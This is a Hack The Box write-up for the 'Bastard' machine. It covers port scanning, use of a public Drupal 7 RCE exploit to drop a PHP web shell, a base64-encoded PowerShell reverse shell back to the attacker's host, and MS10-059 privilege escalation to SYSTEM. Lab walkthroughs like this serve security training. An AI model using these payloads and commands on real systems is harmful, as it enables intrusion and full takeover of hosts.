Basterd - HackMD

###### tags: `htb` `writeup` # Basterd ## enum ### nmap -sS ``` └─$ sudo nmap -sS 10.10.10.9 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 06:33 EDT Nmap scan report for 10.10.10.9 Host is up (0.20s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 49154/tcp open unknown ``` -sSVC ``` └─$ sudo nmap -sSVC 10.10.10.9 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 06:34 EDT Nmap scan report for 10.10.10.9 Host is up (0.18s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-generator: Drupal 7 (http://drupal.org) |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 |_http-server-header: Microsoft-IIS/7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC ``` ### whatweb ``` └─$ whatweb 10.10.10.9 http://10.10.10.9 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript], Title[Welcome to 10.10.10.9 | 10.10.10.9], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.3.28, ASP.NET] ``` ## Drupal7 remote code execution search drupal 7 ![](https://i.imgur.com/eoVMIk0.png) found this rce exploit on exploitdb https://www.exploit-db.com/exploits/41564 I modified parameter in this exploit ```.php $url = 'http://10.10.10.9'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $file = [ 'filename' => 'dixuSOspsOUU.php', 'data' => '<?php system($_REQUEST["cmd"]); ?>' ]; ``` run this exploit and two files are outputed(user.json, session.json) add cookie parameter using cookie manager - cookie parameter(session.json) - URL: http://10.10.10.9 - Name: SESSd873f26fc11f2b7e6e4aa0f6fce59913 - Value: ymHCHpuybdmy_cYnGX0Mn7GXLQvu2prm7I5q7vZsCcE then reloading web page I get admin(created acount) page access the injected page using get method with parameter cmd's os command ***using this query*** GET /dixuSOspsOUU.php?cmd=dir ![](https://i.imgur.com/HOKkIJV.png) ## reverse shell I used this payload to get reverse shell ``` powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA= ``` I run this command on the local machine ``` └─$ rlwrap nc -nlvp 1234 listening on [any] 1234 ... ``` inject to rce vuln I just explained get rev shell like this ``` PS C:\inetpub\drupal-7.54> ``` ### get user.txt I change directory to ```C:\Users\dimitris\Desktop``` ls ``` ls Directory: C:\Users\dimitris\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar-- 2/9/2022 2:30 ?? 34 user.txt ``` and get-Content ``` Get-Content user.txt 2977f52ab3fc66d2a4559027118f36fb ``` ## priv esc windows os information ``` systeminfo | findstr /B /C:"OS Name" /C:"OS Version" OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 ``` systeminfo ``` systeminfo Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-402-3582622-84461 Original Install Date: 18/3/2017, 7:04:46 ?? System Boot Time: 2/9/2022, 2:29:27 ?? System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 2.047 MB Available Physical Memory: 1.575 MB Virtual Memory: Max Size: 4.095 MB Virtual Memory: Available: 3.602 MB Virtual Memory: In Use: 493 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.9 ``` exploit suggester ``` └─$ python2 windows-exploit-suggester.py --database 2022-09-03-mssb.xls --systeminfo ~/ctf/htb/Basterd/basterd_systeminfo.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (ascii) [*] querying database file for potential vulnerabilities [*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [*] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2008 R2 64-bit' [*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [*] done ``` I use exploit MS10-059 https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 git clone this exploit and launch impacket-smbserver on kali access from windows using smb ``` copy \\10.10.14.9\kali\MS10-059.exe MS-10-059.exe ``` and using this exploit reference this site https://kakyouim.hatenablog.com/entry/2020/05/27/010807#MS13-005-medium listen nc on kali ``` rlwrap nc -nlvp 123 ``` run exploit ``` ./MS-10-059.exe 10.10.14.9 123 ``` I get system shell ``` whoami nt authority\system C:\inetpub\drupal-7.54> ``` ### get root.txt ``` type root.txt ecebe2150f1c86df3e33dd93902c3184 C:\Users\Administrator\Desktop> ```